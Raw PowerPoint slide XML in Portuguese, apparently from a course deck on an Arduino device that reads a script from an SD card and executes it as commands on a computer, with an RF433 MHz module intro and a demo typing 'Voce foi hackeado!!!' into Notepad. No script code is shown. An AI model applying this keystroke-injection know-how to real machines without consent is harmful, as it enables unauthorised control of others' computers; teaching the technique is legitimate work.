            <a:off x="4249144" y="281707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BA6EC67-E772-43F1-8D14-22AF4457B8AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6830247" y="283006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791E3B1-912C-4093-A8B2-7CB955C083EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9455644" y="288305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EE1B4CDC-0A20-4801-9118-3C0F5EB79C14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3358796" y="3628958"/>
            <a:ext cx="2314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sketch é enviado ao Controlador Arduino apontando o arquivo no cartão SD que será executado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8C6A787-42C1-4211-9161-9E56A593933C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5902405" y="3571527"/>
            <a:ext cx="22945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Controlador lê o conteúdo do cartão e converte as informações em comandos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64E3B62D-0ECA-4351-BA23-579DEDACD7CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8521462" y="3531351"/>
            <a:ext cx="2470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comandos são executados no computador algo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5208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2" grpId="0" animBg="1"/>
      <p:bldP spid="74" grpId="0"/>
      <p:bldP spid="107" grpId="0" animBg="1"/>
      <p:bldP spid="51" grpId="0" animBg="1"/>
      <p:bldP spid="52" grpId="0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70" grpId="0"/>
      <p:bldP spid="71" grpId="0"/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Utilizando um cartão SD para execução de Script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28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7238E3C5-2FCD-4C40-97D7-D7B21876235C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21179322">
            <a:off x="464848" y="1214316"/>
            <a:ext cx="5035688" cy="4785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A67329E-52E9-4E36-A2B7-5619C07579D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21179322">
            <a:off x="6535214" y="1242862"/>
            <a:ext cx="5035688" cy="4785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ED91EA4D-41C4-4C75-A379-26737C3D2C8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641545" y="1276350"/>
            <a:ext cx="5035688" cy="47855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CE329F3-0B5E-44BF-AA20-4FB23B62B452}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6549406" y="1318752"/>
            <a:ext cx="5035688" cy="47855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59C8BB54-241F-4BB0-976A-F072644AF875}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941692" y="1509643"/>
            <a:ext cx="4394690" cy="3791627"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5015"/>
            </a:avLst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F2F08384-3423-4375-B2B2-CE2C7B0E22B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6933003" y="1762125"/>
            <a:ext cx="4394690" cy="4142461"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3980"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="28575"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Imagem 86">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF5820E0-8D05-4F25-B78B-660F44C2D41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577248" y="1613424"/>
            <a:ext cx="3208523" cy="3586670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4CB1B2D8-2034-4C40-9198-79EC8545541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278512" y="2410574"/>
            <a:ext cx="3779151" cy="3180525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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E74E52CE-E21D-45D1-894D-9187D2343CDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3292052" y="4537029"/>
            <a:ext cx="3217016" cy="868022"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 97368"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D0CECE"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="38100" dir="66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EE7E1327-DF23-431E-A286-48AA8BEF0422}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5677632" y="1613954"/>
            <a:ext cx="3299261" cy="868022"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 97368"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7F7F7F"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="38100" dir="66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BF60121-A399-419B-B176-3C762F955732}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1321843" y="549691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Script Arduino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9C6103B7-52D2-4C80-B4BB-AAE58D620577}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9076070" y="1384076"/>
            <a:ext cx="230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script.txt no cartão SD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="87441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Utilizando um cartão SD para execução de Script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29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4CB1B2D8-2034-4C40-9198-79EC8545541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734484" y="2677773"/>
            <a:ext cx="4289431" cy="36099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17C28AC8-78B4-4C1D-BA96-0A0B3A4FDE91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="405663" y="1215725"/>
            <a:ext cx="11380670" cy="10997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572E1ECD-D7D3-4BA6-9781-BB4B86A69947}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="646854" y="1309510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CEC1930-FCE1-446F-AE11-808CB24C158A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="833913" y="1216144"/>
            <a:ext cx="1086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Perceba a diferença no script que será executado no cartão. Essa forma simples facilita o entendimento e criação de novos scripts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012ADEF-2AD2-4D36-A903-C4D4117C0C64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642957" y="1922223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53572D7-B48B-4604-A821-AB1734D8C94C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830016" y="1828857"/>
            <a:ext cx="1086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só é possível porque o controlador Arduino está convertendo os códigos.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24654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4" grpId="0" animBg="1"/>
      <p:bldP spid="55" grpId="0" animBg="1"/>
      <p:bldP spid="56" grpId="0"/>
      <p:bldP spid="57" grpId="0" animBg="1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039398" y="453860"/>
            <a:ext cx="10541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Introdução ao RF433Mhz</a:t>
            </a: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4D6F8135-BB61-470E-9445-77763AF0F9FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="974221" y="1057071"/>
            <a:ext cx="10323319" cy="1543420"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 990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D2DC975F-2689-47EA-9E21-B195CCD7F46C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1552664" y="1205081"/>
            <a:ext cx="144264" cy="144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5F3A4C47-81E1-4025-B9F5-1722EF4F1CA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1552663" y="1775866"/>
            <a:ext cx="144264" cy="144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7419347-D6DE-47C5-997B-4F25EDA2B965}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1068709" y="1143687"/>
            <a:ext cx="144000" cy="144000"/>
            <a:chOff x="177754" y="764683"/>
            <a:chExt cx="194733" cy="194733"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill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8C7B5E33-8F26-47E1-93B7-8A308C02611A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="177754" y="764683"/>
              <a:ext cx="194733" cy="194733"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" sx="105000" sy="105000" algn="ctr" rotWithShape="0">
                <a:prstClr val="black"/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32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C0F1D797-EC4A-4A53-B76E-2B84B489595A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="72" idx="7"/>
              <a:endCxn id="72" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="206272" y="793201"/>
              <a:ext cx="137697" cy="13769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838D78D1-3B8F-4855-BE35-E10A73EA7032}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1068708" y="2392988"/>
            <a:ext cx="144000" cy="144000"/>
            <a:chOff x="177754" y="764683"/>
            <a:chExt cx="194733" cy="194733"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill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F3B43424-9A6D-458B-880F-A9F55FCBAF38}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="177754" y="764683"/>
              <a:ext cx="194733" cy="194733"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" sx="105000" sy="105000" algn="ctr" rotWithShape="0">
                <a:prstClr val="black"/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32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19B30FA2-651F-4443-AC49-2685CA453F79}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="75" idx="7"/>
              <a:endCxn id="75" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="206272" y="793201"/>
              <a:ext cx="137697" cy="13769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5ACA908-8078-4DD9-8341-BF74C4F57039}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11046583" y="2392987"/>
            <a:ext cx="144000" cy="144000"/>
            <a:chOff x="177754" y="764683"/>
            <a:chExt cx="194733" cy="194733"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill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FF727696-5E76-445F-AE54-0CE957E7D47E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="177754" y="764683"/>
              <a:ext cx="194733" cy="194733"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" sx="105000" sy="105000" algn="ctr" rotWithShape="0">
                <a:prstClr val="black"/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32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2C89A0B4-F070-4393-8BF8-EDC26141A714}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="78" idx="7"/>
              <a:endCxn id="78" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="206272" y="793201"/>
              <a:ext cx="137697" cy="13769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C518EA4B-44AF-4DFD-828F-89FAF26F381C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11025494" y="1143178"/>
            <a:ext cx="144000" cy="144000"/>
            <a:chOff x="177754" y="764683"/>
            <a:chExt cx="194733" cy="194733"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill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B170BCEB-06DD-496A-9D18-4839FE36D315}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="177754" y="764683"/>
              <a:ext cx="194733" cy="194733"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" sx="105000" sy="105000" algn="ctr" rotWithShape="0">
                <a:prstClr val="black"/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32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0C65FEC8-337F-4287-8A35-CF01A29EDD4C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="81" idx="7"/>
              <a:endCxn id="81" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="206272" y="793201"/>
              <a:ext cx="137697" cy="13769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37CF9613-E40C-4645-BFDE-8C46694CF8E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1833726" y="1126323"/>
            <a:ext cx="948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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>módulo de RF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> (abreviação de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>módulo de radiofrequência</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> ) é um (geralmente) pequeno dispositivo eletrônico usado para transmitir e / ou receber sinais de rádio entre dois dispositivos. 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2BC25442-6CE8-40F3-9D89-6604977185FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1833725" y="1721429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comunicações de RF incorporam um </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>transmissor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> e um </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>receptor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0A4E49C7-AF22-45BA-AD1F-CC9CC466360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48032" y="2985307"/>
            <a:ext cx="5577071" cy="3278171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26AAF881-937B-46C9-9E88-2CD69515804C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="974222" y="4110039"/>
            <a:ext cx="5436104" cy="2043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9DCFD7E2-B7F4-498C-A142-FD8DB3891800}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6669263" y="2998857"/>
            <a:ext cx="4631229" cy="2319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B71C48-3E0D-452D-AEBC-D911D71D44AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6727348" y="3147064"/>
            <a:ext cx="4358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53"/>
              </a:rPr>
              <a:t>https://www.google.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1">
                <a:hlinkClick r:id="rId53"/>
              </a:rPr>
              <a:t>search?safe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:hlinkClick r:id="rId53"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1">
                <a:hlinkClick r:id="rId53"/>
              </a:rPr>
              <a:t>active&amp;biw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:hlinkClick r:id="rId53"/>
              </a:rPr>
              <a:t>=1920&amp;bih=920&amp;tbm=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1">
                <a:hlinkClick r:id="rId53"/>
              </a:rPr>
              <a:t>shop&amp;ei</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:hlinkClick r:id="rId53"/>
              </a:rPr>
              <a:t>=TqnKXY6MEqCu5OUPl8GMkAE&amp;q=rf433&amp;oq=rf433&amp;gs_l=psy-ab-sh.3..0i67k1.1845.1845.0.2093.1.1.0.0.0.0.118.118.0j1.1.0....0...1c.1.64.psy-ab-sh..0.1.118....0.-PlKczNIQqo</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0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058F2D34-4773-4706-8B20-23910A2B999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32216" y="4327197"/>
            <a:ext cx="4988558" cy="1613690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Retângulo 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAAD45B4-30CD-4E56-ABD1-F35B3281B5B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1546140" y="2222092"/>
            <a:ext cx="144264" cy="144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FC86DBE-9A20-42E8-8233-D4FCADDD1F79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1827202" y="2167655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Transmissores e receptores RF433Mhz podem ser facilmente encontrados na internet.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174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  <p:bldP spid="69" grpId="0" animBg="1"/>
      <p:bldP spid="70" grpId="0" animBg="1"/>
      <p:bldP spid="83" grpId="0"/>
      <p:bldP spid="84" grpId="0"/>
      <p:bldP spid="86" grpId="0" animBg="1"/>
      <p:bldP spid="88" grpId="0" animBg="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="65" grpId="0" animBg="1"/>
      <p:bldP spid="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Dissecando o Script do Cartão SD – script.txt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CD61469-5EC2-4168-AE61-6FDAAD15ADA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341224" y="1006865"/>
            <a:ext cx="7824876" cy="5215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7F6C8E31-039D-4780-9BD4-3304D759BBEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345320" y="2123688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668EFDC8-5CB0-47CF-AB6E-88926A80DFE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345320" y="1940907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D0F63F6-2C81-4DBF-82B3-194924693C85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345320" y="2306469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24B017-9EDF-4BAA-B2EB-62FA5121C9B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345320" y="2489250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3F9BF82-1D1E-4E3C-9512-FBDE9E9E6524}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345320" y="2672031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0B88625-B4EA-4F2A-A27F-BD44E7245FF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345320" y="2854812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0331A108-DE75-4520-8BBA-CC8E8B194350}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345320" y="3037593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DCD4D3F7-2ED0-4127-8BDF-95879E8EE1C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345320" y="3220374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D4691CA-6E25-40E8-BD06-3FC01CACC08F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345320" y="3403155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6DAC901-1DC6-4442-B403-E1E8A5E77103}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345320" y="3585936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03413D6-3A0A-4B6A-8D4F-9A28043DAC9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345320" y="3768717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A7E26020-A92F-40B0-B460-86A4A5149E81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345320" y="3951498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7F412F1-A10B-421E-AF46-4D6A23348778}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345320" y="4134279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DD292CD0-D69F-4760-96A6-5CB9F1EDE45E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345320" y="4317060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42893AA-26FC-46BC-8173-561E0C3FD13D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345320" y="4499841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CD0FAB59-4344-48C6-8D6D-CFDDC0C4374B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345320" y="4682622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7A8FDF15-B26A-498A-B074-BF6467196C83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345320" y="4865403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A0CA89C-13AB-40A7-A0CA-073DE0DB3B42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345320" y="5048190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30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D585454E-49E9-4F65-847E-F5FAD238A99E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6918669" y="2436635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3CEF1EB-30A3-4CA2-BE6A-6DEF2D4DF920}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6918669" y="2067471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ABBB251D-89B5-4542-9E58-8CA6F9FCCBBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6918669" y="2621217"/>
            <a:ext cx="291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o Texto “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Voce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> foi hackeado!!!”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69FEA441-69AF-4588-B39E-53605A5F5566}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6918669" y="2990381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4516525-14BE-452F-BFD6-43AD13A244A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6918669" y="1882889"/>
            <a:ext cx="1307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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Notepad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DABDA04-A4B4-4CAE-A8CF-860A3EFCF9ED}"/>
